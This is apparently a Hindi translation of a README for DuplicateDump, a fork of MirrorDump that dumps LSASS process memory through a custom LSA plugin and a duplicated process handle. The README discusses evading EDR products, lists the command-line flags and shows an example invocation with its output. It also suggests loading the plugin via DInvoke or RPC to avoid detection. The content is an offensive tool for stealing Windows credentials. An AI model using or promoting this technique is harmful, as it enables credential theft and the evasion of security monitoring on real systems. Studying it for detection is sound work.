
कस्टम LSA प्लगइन से एक डुप्लिकेटेड हैंडल का उपयोग करके LSASS की डंपिंग
DuplicateDump, MirrorDump का एक फोर्क है जिसमें निम्नलिखित संशोधन हैं:
DuplicateDump एक कस्टम LSA प्लगइन जोड़ता है जो LSASS प्रक्रिया से DuplicateDump में LSASS प्रक्रिया हैंडल की नकल बनाता है। इस प्रकार DuplicateDump के पास OpenProcess का आह्वान किए बिना LSASS के लिए उपयोग के लिए तैयार प्रक्रिया हैंडल होता है।
DuplicateDump को मेमोरी में लोड करके, यह बिना पहचान के LSASS मेमोरी डंप करने में सक्षम था:
Cortex XDR, Crowdstrike द्वारा पहचाना गया। SentinalOne पर बिना पहचान के lsass डंप करने में विफल रहा।
LSA प्लगइन संकलित करें (या तो SpLsaModeInitialize या dllMain फ़ंक्शन निर्यात करें) और DLL का पूरा पथ DuplicateDump को प्रदान करें।
.\DuplicateDump.exe --help
-f, --filename=VALUE The path to write the dump file to
-p, --plugin=VALUE Full file path to LSA plugin
-c, --compress GZip and delete the dump file on disk
-d, --DebugPriv Obtain SeDebugPrivilege
-h, --help Display this help
उदाहरण
.\DuplicateDump.exe -f test -c -p C:\LSAPlugin.dll
[+] Loading LSA security package
[+] Named pipe connected and replying with current PID 6492
[+] Found duplicated LSASS process handle 0x3d0
[+] Compressed dump file saved to test.gz
DuplicateDump LSA प्लगइन लोड करने के लिए API AddSecurityPackage को कॉल करने के लिए DInvoke का उपयोग करता है। आप उस API कॉल को सीधे आह्वान किए बिना RPC कॉल का उपयोग कर सकते हैं। XPN के ब्लॉग पोस्ट में विवरण देखें।
हाल ही में, splinter_code ने खोजा कि LSASS को डंप करने के लिए SecLogon का लाभ उठाया जा सकता है। दृढ़ता से अनुशंसा करते हैं कि आप उनके ब्लॉग पोस्ट का अध्ययन करें।